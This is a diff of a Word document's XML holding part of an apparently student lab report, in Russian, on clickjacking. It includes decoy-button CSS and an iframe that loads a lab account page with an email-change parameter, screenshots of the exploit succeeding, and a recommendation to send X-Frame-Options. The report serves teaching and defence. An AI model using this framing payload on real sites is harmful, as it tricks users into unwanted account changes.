+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>background</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:#22c55e;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>color</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:#022c22;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>border-radius:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>999px;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>font-weight:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>700;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cursor:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>pointer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;/style&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>div</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;Нажми на меня, ну </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>пожалуйста!&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>div</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;iframe sandbox="allow-forms"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        src="http://62.173.140.174:36108/my-account?email=attacker@example.com"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>iframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:r>
-        <w:t>height:500</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">px;   </w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">  /* высота </w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Кликнул на текст-приманку</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Обновился адрес</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="-567"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4991100" cy="2908990"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:docPr id="3" name="Рисунок 3" descr="E:\workspace\AppSec\AppSec\15\эксплоит.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 3" descr="E:\workspace\AppSec\AppSec\15\эксплоит.png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5001812" cy="2915233"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="-567"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4254500" cy="3086201"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2" name="Рисунок 2" descr="E:\workspace\AppSec\AppSec\15\тест1.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 2" descr="E:\workspace\AppSec\AppSec\15\тест1.png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4266968" cy="3095245"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="-567"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5426020" cy="2870200"/>
+            <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
+            <wp:docPr id="4" name="Рисунок 4" descr="E:\workspace\AppSec\AppSec\15\Успех.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 4" descr="E:\workspace\AppSec\AppSec\15\Успех.png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5435879" cy="2875415"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">В реальном приложении злоумышленник может манипулировать действиями пользователя. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>В</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>сегда отправлять</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>HTTP-заголовок</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> X-</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Frame</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Options</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>: DENY или SAMEORIGIN</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, то злоумышленник не сможет корректно загрузить </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>страницы</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> в </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
         <w:t>iframe</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> */</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-      </w:pPr>
-      <w:r>
-        <w:t>        opacity:0.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>1;   </w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>   /* сначала полупрозрачно для выравнивания */</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>z-index:2;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>        border:0;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>    }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>    div {</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> на своём домене</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Или</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">использовать </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>директив</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
